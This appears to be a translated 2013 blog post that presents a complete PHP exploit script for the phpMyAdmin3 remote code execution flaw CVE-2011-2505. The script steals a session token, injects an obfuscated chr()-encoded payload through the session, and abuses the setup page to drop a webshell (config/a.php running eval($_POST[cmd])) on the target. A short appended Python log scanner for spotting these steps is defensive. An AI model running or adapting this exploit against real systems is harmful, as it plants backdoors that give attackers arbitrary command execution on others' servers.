phpMyAdmin3 remote code execute exploit (PHP version)

Posted by OP on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and my blog has not been updated either.

Last night I was up all night with the kid and saw 黑哥 discussing the phpMyAdmin3 vulnerability in the php security group. I had not read the vulnerable code before, though a while back I did see wofeiwo's exp on Weibo; 黑哥 said there was a way to exploit it that is not jilei (not useless), so during the night I dug the code out and studied it, and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine is just rehashing old stuff, purely research to pass the time.

First, props to wofeiwo's Python version of the exp, and props to wofeiwo's and superhei's research spirit; role models to learn from. That earlier exp, however, had some limitations when used:
First, it requires session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already blocked by .htaccess.
And of course there is a third point, a gap nobody can get around: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really is not that useless after all.

So I wrote this PHP version of the exp; the code follows:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 * (a "404" anywhere in the raw response is taken to mean it is missing)
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 * (group 1 of the regex is the phpMyAdmin session cookie, group 3 the token)
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=isset($resp[3])?$resp[3]:'';
$sessionid=isset($resp[1])?$resp[1]:'';
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise.
 * Returns the full response (headers and body) as one string.
**/
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
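As an added defender-side example (not part of the original post or the exploit above): each of the exploit's stages leaves a recognisable request in the web server's access log, and the Python below flags those stages over constructed combined-format log lines. The `/pma/` path, the client IPs and the log lines themselves are assumptions made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format line: client, timestamp, "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def classify(line):
    """Return the exploit stages (labels) a single access-log line matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method = m.group('method')
    target = unquote_plus(m.group('target'))   # %5B/%5D -> [ ] so encoding cannot hide the key
    path, _, query = target.partition('?')
    findings = []
    # Stage 1: $_SESSION keys pushed in through the query string, the pattern the
    # exploit uses (session_to_unset plus _SESSION[...] parameters)
    if '_SESSION[' in query or 'session_to_unset=' in query:
        findings.append('session-injection')
    # Stage 2: the setup script asked to save, which writes config/config.inc.php
    if method == 'POST' and path.endswith('/setup/config.php'):
        findings.append('setup-config-save')
    # Stage 3: a PHP file under config/ served successfully (the dropped shell,
    # or config.inc.php itself, which the exploit fetches to verify success)
    if m.group('status') == '200' and re.search(r'/config/[^/]+\.php$', path):
        findings.append('config-dir-php-hit')
    return findings

def scan(lines):
    """Index of every flagged line -> its findings (clean lines are omitted)."""
    return {i: f for i, f in enumerate(map(classify, lines)) if f}

# Constructed sample log (not real traffic); 10.0.0.5 plays the three exploit stages
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/config/ HTTP/1.1" 403 221',
    '10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/index.php HTTP/1.1" 200 8120',
    '10.0.0.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=t00ls'
    '&_SESSION%5BConfigFile%5D%5BServers%5D%5B0%5D%5Bhost%5D=t00ls.net HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Feb/2013:09:13:06 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 1044',
    '10.0.0.5 - - [21/Feb/2013:09:13:07 +0800] "GET /pma/config/a.php HTTP/1.1" 200 5',
    '10.0.0.9 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?db=test HTTP/1.1" 200 8120',
]

if __name__ == '__main__':
    for i, f in scan(SAMPLE_LOG).items():
        print(i, f, SAMPLE_LOG[i][:70])
```

Any one of the three labels from the same client within a short window is worth an alert; all three in sequence is the full chain described in the post.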